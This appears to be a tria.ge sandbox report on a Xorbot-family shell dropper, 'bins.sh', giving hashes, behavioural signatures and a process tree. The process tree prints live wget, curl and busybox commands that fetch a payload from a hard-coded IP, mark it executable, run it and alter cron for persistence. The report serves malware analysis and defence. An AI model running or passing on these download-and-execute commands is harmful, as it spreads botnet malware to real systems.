Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
129s -
max time network
150s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240611-en -
resource tags
arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system -
submitted
05/01/2025, 02:12
Static task
static1
Behavioral task
behavioral1
Sample
bins.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
bins.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
bins.sh
Resource
debian9-mipsbe-20240729-en
Behavioral task
behavioral4
Sample
bins.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
bins.sh
-
Size
10KB
-
MD5
14d81ef351bb6aae82ee36299ec51f37
-
SHA1
58f421dee90f5cf84f804bc5fdd25e6c772bd694
-
SHA256
a951ff81fba393bc4198415409f8debbd1810cd12428e09d4911db31b2c13865
-
SHA512
fd5442120434dd9da842e3d123263711ed0c0052b53d66f04c5c4b9e966208181ea139e2efdd758237a1a4500f08bad61cc6319ccd96314b97a940f4bc318c40
-
SSDEEP
192:Fnbdk8L13hLVWSX3Lvemcu6JdL13hLVWSLTemcu6JWXO:xdko3LYG
Malware Config
Signatures
-
resource yara_rule behavioral1/files/fstream-1.dat family_xorbot -
Xorbot family
-
Contacts a large (2088) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
File and Directory Permissions Modification 1 TTPs 1 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 1519 chmod -
Executes dropped EXE 1 IoCs
ioc pid Process /tmp/LtkpZguVtCTJd23rFFXldJBI8f2R4en4iE 1520 LtkpZguVtCTJd23rFFXldJBI8f2R4en4iE -
Renames itself 1 IoCs
pid Process 1521 LtkpZguVtCTJd23rFFXldJBI8f2R4en4iE -
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates/modifies Cron job 1 TTPs 1 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
description ioc Process File opened for modification /var/spool/cron/crontabs/tmp.4ryq8f crontab -
Enumerates running processes
Discovers information about currently running processes on the system
-
description ioc Process File opened for reading /proc/408/cmdline LtkpZguVtCTJd23rFFXldJBI8f2R4en4iE File opened for reading /proc/1526/cmdline LtkpZguVtCTJd23rFFXldJBI8f2R4en4iE File opened for reading /proc/1630/cmdline LtkpZguVtCTJd23rFFXldJBI8f2R4en4iE File opened for reading /proc/1632/cmdline LtkpZguVtCTJd23rFFXldJBI8f2R4en4iE File opened for reading /proc/1731/cmdline LtkpZguVtCTJd23rFFXldJBI8f2R4en4iE File opened for reading /proc/98/cmdline LtkpZguVtCTJd23rFFXldJBI8f2R4en4iE File opened for reading /proc/710/cmdline LtkpZguVtCTJd23rFFXldJBI8f2R4en4iE File opened for reading /proc/1292/cmdline LtkpZguVtCTJd23rFFXldJBI8f2R4en4iE File opened for reading /proc/1660/cmdline LtkpZguVtCTJd23rFFXldJBI8f2R4en4iE File opened for reading /proc/1723/cmdline LtkpZguVtCTJd23rFFXldJBI8f2R4en4iE File opened for reading /proc/1678/cmdline LtkpZguVtCTJd23rFFXldJBI8f2R4en4iE File opened for reading /proc/167/cmdline LtkpZguVtCTJd23rFFXldJBI8f2R4en4iE File opened for reading /proc/205/cmdline LtkpZguVtCTJd23rFFXldJBI8f2R4en4iE File opened for reading /proc/1107/cmdline LtkpZguVtCTJd23rFFXldJBI8f2R4en4iE File opened for reading /proc/1151/cmdline LtkpZguVtCTJd23rFFXldJBI8f2R4en4iE File opened for reading /proc/1502/cmdline LtkpZguVtCTJd23rFFXldJBI8f2R4en4iE File opened for reading /proc/1617/cmdline LtkpZguVtCTJd23rFFXldJBI8f2R4en4iE File opened for reading /proc/726/cmdline LtkpZguVtCTJd23rFFXldJBI8f2R4en4iE File opened for reading /proc/1653/cmdline LtkpZguVtCTJd23rFFXldJBI8f2R4en4iE File opened for reading /proc/1656/cmdline LtkpZguVtCTJd23rFFXldJBI8f2R4en4iE File opened for reading /proc/1710/cmdline LtkpZguVtCTJd23rFFXldJBI8f2R4en4iE File opened for reading /proc/1713/cmdline LtkpZguVtCTJd23rFFXldJBI8f2R4en4iE File opened for reading /proc/1709/cmdline LtkpZguVtCTJd23rFFXldJBI8f2R4en4iE File opened for reading /proc/1715/cmdline LtkpZguVtCTJd23rFFXldJBI8f2R4en4iE File opened for reading /proc/5/cmdline LtkpZguVtCTJd23rFFXldJBI8f2R4en4iE File opened for reading /proc/20/cmdline LtkpZguVtCTJd23rFFXldJBI8f2R4en4iE File opened for reading /proc/169/cmdline LtkpZguVtCTJd23rFFXldJBI8f2R4en4iE File opened for reading /proc/1599/cmdline LtkpZguVtCTJd23rFFXldJBI8f2R4en4iE File opened for reading /proc/1627/cmdline LtkpZguVtCTJd23rFFXldJBI8f2R4en4iE File opened for reading /proc/1667/cmdline LtkpZguVtCTJd23rFFXldJBI8f2R4en4iE File opened for reading /proc/1537/cmdline LtkpZguVtCTJd23rFFXldJBI8f2R4en4iE File opened for reading /proc/1583/cmdline LtkpZguVtCTJd23rFFXldJBI8f2R4en4iE File opened for reading /proc/1732/cmdline LtkpZguVtCTJd23rFFXldJBI8f2R4en4iE File opened for reading /proc/27/cmdline LtkpZguVtCTJd23rFFXldJBI8f2R4en4iE File opened for reading /proc/173/cmdline LtkpZguVtCTJd23rFFXldJBI8f2R4en4iE File opened for reading /proc/676/cmdline LtkpZguVtCTJd23rFFXldJBI8f2R4en4iE File opened for reading /proc/1288/cmdline LtkpZguVtCTJd23rFFXldJBI8f2R4en4iE File opened for reading /proc/1735/cmdline LtkpZguVtCTJd23rFFXldJBI8f2R4en4iE File opened for reading /proc/605/cmdline LtkpZguVtCTJd23rFFXldJBI8f2R4en4iE File opened for reading /proc/1544/cmdline LtkpZguVtCTJd23rFFXldJBI8f2R4en4iE File opened for reading /proc/1570/cmdline LtkpZguVtCTJd23rFFXldJBI8f2R4en4iE File opened for reading /proc/1698/cmdline LtkpZguVtCTJd23rFFXldJBI8f2R4en4iE File opened for reading /proc/1711/cmdline LtkpZguVtCTJd23rFFXldJBI8f2R4en4iE File opened for reading /proc/1719/cmdline LtkpZguVtCTJd23rFFXldJBI8f2R4en4iE File opened for reading /proc/1597/cmdline LtkpZguVtCTJd23rFFXldJBI8f2R4en4iE File opened for reading /proc/1638/cmdline LtkpZguVtCTJd23rFFXldJBI8f2R4en4iE File opened for reading /proc/174/cmdline LtkpZguVtCTJd23rFFXldJBI8f2R4en4iE File opened for reading /proc/177/cmdline LtkpZguVtCTJd23rFFXldJBI8f2R4en4iE File opened for reading /proc/1064/cmdline LtkpZguVtCTJd23rFFXldJBI8f2R4en4iE File opened for reading /proc/1169/cmdline LtkpZguVtCTJd23rFFXldJBI8f2R4en4iE File opened for reading /proc/1554/cmdline LtkpZguVtCTJd23rFFXldJBI8f2R4en4iE File opened for reading /proc/1573/cmdline LtkpZguVtCTJd23rFFXldJBI8f2R4en4iE File opened for reading /proc/1648/cmdline LtkpZguVtCTJd23rFFXldJBI8f2R4en4iE File opened for reading /proc/1649/cmdline LtkpZguVtCTJd23rFFXldJBI8f2R4en4iE File opened for reading /proc/1654/cmdline LtkpZguVtCTJd23rFFXldJBI8f2R4en4iE File opened for reading /proc/1662/cmdline LtkpZguVtCTJd23rFFXldJBI8f2R4en4iE File opened for reading /proc/1693/cmdline LtkpZguVtCTJd23rFFXldJBI8f2R4en4iE File opened for reading /proc/417/cmdline LtkpZguVtCTJd23rFFXldJBI8f2R4en4iE File opened for reading /proc/463/cmdline LtkpZguVtCTJd23rFFXldJBI8f2R4en4iE File opened for reading /proc/1150/cmdline LtkpZguVtCTJd23rFFXldJBI8f2R4en4iE File opened for reading /proc/1568/cmdline LtkpZguVtCTJd23rFFXldJBI8f2R4en4iE File opened for reading /proc/1674/cmdline LtkpZguVtCTJd23rFFXldJBI8f2R4en4iE File opened for reading /proc/11/cmdline LtkpZguVtCTJd23rFFXldJBI8f2R4en4iE File opened for reading /proc/1193/cmdline LtkpZguVtCTJd23rFFXldJBI8f2R4en4iE -
Writes file to tmp directory 3 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/LtkpZguVtCTJd23rFFXldJBI8f2R4en4iE wget File opened for modification /tmp/LtkpZguVtCTJd23rFFXldJBI8f2R4en4iE curl File opened for modification /tmp/LtkpZguVtCTJd23rFFXldJBI8f2R4en4iE busybox
Processes
-
/tmp/bins.sh/tmp/bins.sh1⤵PID:1511
-
/bin/rm/bin/rm bins.sh2⤵PID:1512
-
-
/usr/bin/wgetwget http://66.63.187.225/bins/LtkpZguVtCTJd23rFFXldJBI8f2R4en4iE2⤵
- Writes file to tmp directory
PID:1513
-
-
/usr/bin/curlcurl -O http://66.63.187.225/bins/LtkpZguVtCTJd23rFFXldJBI8f2R4en4iE2⤵
- Writes file to tmp directory
PID:1517
-
-
/bin/busybox/bin/busybox wget http://66.63.187.225/bins/LtkpZguVtCTJd23rFFXldJBI8f2R4en4iE2⤵
- Writes file to tmp directory
PID:1518
-
-
/bin/chmodchmod 777 LtkpZguVtCTJd23rFFXldJBI8f2R4en4iE2⤵
- File and Directory Permissions Modification
PID:1519
-
-
/tmp/LtkpZguVtCTJd23rFFXldJBI8f2R4en4iE./LtkpZguVtCTJd23rFFXldJBI8f2R4en4iE2⤵
- Executes dropped EXE
- Renames itself
- Reads runtime system information
PID:1520 -
/bin/shsh -c "crontab -l"3⤵PID:1522
-
/usr/bin/crontabcrontab -l4⤵PID:1523
-
-
-
/bin/shsh -c "crontab -"3⤵PID:1524
-
/usr/bin/crontabcrontab -4⤵
- Creates/modifies Cron job
PID:1525
-
-
-
-
/bin/rmrm LtkpZguVtCTJd23rFFXldJBI8f2R4en4iE2⤵PID:1527
-
-
/usr/bin/wgetwget http://66.63.187.225/bins/aufK8cCuLXUgGcF5gRWjQmCKH0sKidBFiY2⤵PID:1530
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
112KB
MD505d7857dcead18bbd86d2935f591873c
SHA134d18f41ef35f93d5364ce3e24d74730a4e91985
SHA2562cb1fa4742268fb0196613aee7a39a08a0707b3ef8853280d5060c44f3650d70
SHA512d1793861067758a064ac1d59c80c78f9cb4b64dd680ab4a62dd050156dc0318dde590c7b44c1184c9ee926f73c3fc242662e42645faab6685ecef9d238d2e53e
-
Filesize
210B
MD5367fb79142bc67d9579d45e9e4556bb9
SHA14c3e9d83747016237e41481e70eecebfc35ba3cf
SHA256b034f1ab620299cae1ca10ac3651e9919629638a9199de73f91d6f43b5b095b6
SHA5122f8a3ce423f0805df9522ba19a20d365c87e0e251fe1858682889efb0990a617742ee6b2eb5d1e90e11f6bb307af6cdc1d033be03ada5ea734d77e0b3759a5e6